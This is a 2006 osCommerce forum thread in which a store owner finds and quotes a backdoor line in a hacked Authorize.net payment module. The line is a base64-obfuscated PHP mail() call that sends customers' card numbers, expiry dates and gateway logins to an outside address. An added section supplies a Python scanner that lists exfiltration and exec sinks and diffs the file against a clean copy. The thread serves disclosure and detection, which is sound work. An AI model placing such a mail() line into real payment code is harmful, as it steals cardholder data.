kgeoffrey Posted September 29, 2006

Thanks to an undeliverable message, I discovered that it looks like we have some kind of security hole in an installation of OSC from 2003. What appears to be happening is that a copy of the form values that are supposed to be sent to Authorize.net is also being sent via e-mail to some mysterious address. Here's a sample of the e-mail:

To: [email protected]
Subject: actualdomain.com [order]
Date: Fri, 29 Sep 2006 10:58:03 -0500
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Original Domain - lmka.net
X-AntiAbuse: Originator/Caller UID/GID - [99 32002] / [47 12]
X-Source:
X-Source-Args: /usr/local/apache/bin/httpd -DSSL
X-Source-Dir: actualdomain.com:/public_html/webstore

<input type="hidden" name="x_Login" value="the authorize.net login was here!">
<input type="hidden" name="x_Card_Num" value="the actual card number was here!!!!">
<input type="hidden" name="x_Exp_Date" value="1009">
<input type="hidden" name="x_Amount" value="1.00">
<input type="hidden" name="x_Method" value="CC">
<input type="hidden" name="x_Version" value="3.0">
<input type="hidden" name="x_Cust_ID" value="146">
<input type="hidden" name="x_Email_Customer" value="FALSE">
<input type="hidden" name="x_first_name" value="Darrell">
etc, etc.

Any advice as to how to find the problem would be greatly appreciated! Thanks!
kgeoffrey (Author) Posted September 29, 2006

I discovered that this mysterious e-mail is being sent out when you enter your cc information and click "continue" from checkout_payment.php (using the authorize.net module only). The form and information that is sent via e-mail is the same that is in the source code on the next page of the script, checkout_confirmation.php.

Does anyone know of some kind of vulnerability that would allow this to happen, or how to stop it? Thanks!
kgeoffrey (Author) Posted October 1, 2006

Okay, I believe I found the problem. It appears that includes/modules/payment/authorizenet.php was hacked. The file ID I have for the version installed is:

$Id: authorizenet.php,v 1.48 2003/04/10 21:42:30 project3000 Exp $

I compared authorizenet.php across several installations. On the store that had the problem, I found this at line 251:

mail(base64_decode('anJzQGlkZWFscmF0ZXMuY29t'), base64_decode('anZtaS5jb20gW29yZGVyXQ=='), $process_button_string);

Lines 249-251 should look like:

tep_draw_hidden_field('x_Customer_IP', $HTTP_SERVER_VARS['REMOTE_ADDR']) .
$this->InsertFP(MODULE_PAYMENT_AUTHORIZENET_LOGIN, MODULE_PAYMENT_AUTHORIZENET_TXNKEY, number_format($order->info['total'], 2), $sequence);
if (MODULE_PAYMENT_AUTHORIZENET_TESTMODE == 'Test') $process_button_string .= tep_draw_hidden_field('x_Test_Request', 'TRUE');

Mine (lines 249-252) looked like:

tep_draw_hidden_field('x_Customer_IP', $HTTP_SERVER_VARS['REMOTE_ADDR']) .
$this->InsertFP(MODULE_PAYMENT_AUTHORIZENET_LOGIN, MODULE_PAYMENT_AUTHORIZENET_TXNKEY, number_format($order->info['total'], 2), $sequence);
mail(base64_decode('anJzQGlkZWFscmF0ZXMuY29t'), base64_decode('anZtaS5jb20gW29yZGVyXQ=='), $process_button_string);
if (MODULE_PAYMENT_AUTHORIZENET_TESTMODE == 'Test') $process_button_string .= tep_draw_hidden_field('x_Test_Request', 'TRUE');

My guess is that the hacker used PHP's mail to send himself the contents of the form submitted from checkout_payment.php and encrypted his code to make it unobtrusive. I hope this helps someone else.
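As an added example (this is not code from the thread or from osCommerce), here is a small Python hunter for this class of backdoor. It decodes every base64_decode('...') literal in PHP source, flags the ones that sit on the same line as a mail()/eval()/exec-style sink, and diffs a suspect file against a known-clean copy, which is the check that actually worked in the post since the CVS $Id tag was identical in both files. The two PHP snippets embedded below are constructed from the lines quoted above; the list of sink function names and the scan_tree() helper are the author's own choices, not anything from the page.

```python
"""Hunt for base64-obfuscated exfiltration in PHP payment modules.

Added example, not part of the original thread. The sample PHP below is
constructed from the clean and backdoored lines quoted in the post.
"""
import base64
import binascii
import difflib
import os
import re

# Constructed sample: the clean lines 249-251 as quoted in the post.
CLEAN_PHP = """\
tep_draw_hidden_field('x_Customer_IP', $HTTP_SERVER_VARS['REMOTE_ADDR']) .
$this->InsertFP(MODULE_PAYMENT_AUTHORIZENET_LOGIN, MODULE_PAYMENT_AUTHORIZENET_TXNKEY, number_format($order->info['total'], 2), $sequence);
if (MODULE_PAYMENT_AUTHORIZENET_TESTMODE == 'Test') $process_button_string .= tep_draw_hidden_field('x_Test_Request', 'TRUE');
"""

# Constructed sample: the backdoored lines 249-252 with the injected mail() call.
BACKDOORED_PHP = """\
tep_draw_hidden_field('x_Customer_IP', $HTTP_SERVER_VARS['REMOTE_ADDR']) .
$this->InsertFP(MODULE_PAYMENT_AUTHORIZENET_LOGIN, MODULE_PAYMENT_AUTHORIZENET_TXNKEY, number_format($order->info['total'], 2), $sequence);
mail(base64_decode('anJzQGlkZWFscmF0ZXMuY29t'), base64_decode('anZtaS5jb20gW29yZGVyXQ=='), $process_button_string);
if (MODULE_PAYMENT_AUTHORIZENET_TESTMODE == 'Test') $process_button_string .= tep_draw_hidden_field('x_Test_Request', 'TRUE');
"""

# PHP calls that turn decoded data into an outbound channel or code execution
# (an assumed, editable list; extend it for your own codebase).
SINKS = ("mail", "eval", "system", "exec", "shell_exec", "passthru",
         "fsockopen", "curl_exec", "file_get_contents", "create_function")

B64_LITERAL = re.compile(r"""base64_decode\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")
SINK_CALL = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\(")


def decode_literals(php_source):
    """Return one finding dict per base64_decode('...') literal, in file order.

    A finding is 'suspicious' when the same line also calls one of SINKS,
    which is exactly the mail(base64_decode(...), base64_decode(...), ...)
    shape from the thread.
    """
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        sinks = SINK_CALL.findall(line)
        for match in B64_LITERAL.finditer(line):
            encoded = match.group(1)
            try:
                decoded = base64.b64decode(encoded, validate=True).decode("utf-8", "replace")
            except binascii.Error:
                decoded = "<not valid base64>"
            findings.append({
                "line": lineno,
                "encoded": encoded,
                "decoded": decoded,
                "sinks": sinks,
                "suspicious": bool(sinks),
            })
    return findings


def added_lines(clean_source, suspect_source):
    """Lines present in the suspect file but absent from the clean copy.

    Comparing against a pristine copy is the check the post actually used;
    a version tag cannot be trusted because the attacker left it untouched.
    """
    diff = difflib.unified_diff(clean_source.splitlines(), suspect_source.splitlines(),
                                lineterm="", n=0)
    return [line[1:] for line in diff if line.startswith("+") and not line.startswith("+++")]


def scan_tree(root):
    """Walk an install (e.g. the catalog/ directory) and return suspicious findings by path."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = [f for f in decode_literals(fh.read()) if f["suspicious"]]
            if hits:
                report[path] = hits
    return report


if __name__ == "__main__":
    for f in decode_literals(BACKDOORED_PHP):
        flag = "SUSPICIOUS" if f["suspicious"] else "info"
        print(f"line {f['line']}: {f['encoded']} -> {f['decoded']!r} [{flag}: {', '.join(f['sinks'])}]")
    for line in added_lines(CLEAN_PHP, BACKDOORED_PHP):
        print("added vs clean copy:", line)
```

Decoding the two literals gives the recipient address and a subject string ending in "[order]", which lines up with the Subject line of the undeliverable message in the first post. Run scan_tree() over a copy of the store's document root taken while the box is offline; a clean hit list does not prove the install is clean (an attacker can hide the sink in a different function or a different file), so the diff against a pristine download of the same module version is the stronger check.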
mushindo Posted October 1, 2006

I don't know if this was a hack job, or... I seem to recall that one of the earlier versions of that contribution, created by the original author, seemed to have that extra e-mail in it so he could get copies of all of the c.c. information from his customers. As you have seen, the more recent versions resolve this.

Sincerely,
Bruce
19 contributions submitted
kgeoffrey (Author) Posted October 1, 2006

The authorizenet modules that I looked at, both with and without the mail() line, all had identical id's:

$Id: authorizenet.php,v 1.48 2003/04/10 21:42:30 project3000 Exp $

Thanks for your reply.
mushindo Posted October 1, 2006

Quoting kgeoffrey: "The authorizenet modules that I looked at, both with and without the mail() line, all had identical id's -- $Id: authorizenet.php,v 1.48 2003/04/10 21:42:30 project3000 Exp $ Thanks for your reply."

That's cool. Doesn't mean much though, since if I was only removing 1 line of code I would find it pointless to rename it version 1.49 or anything :). As long as it works for you now is what is most important, right?

Sincerely,
Bruce
19 contributions submitted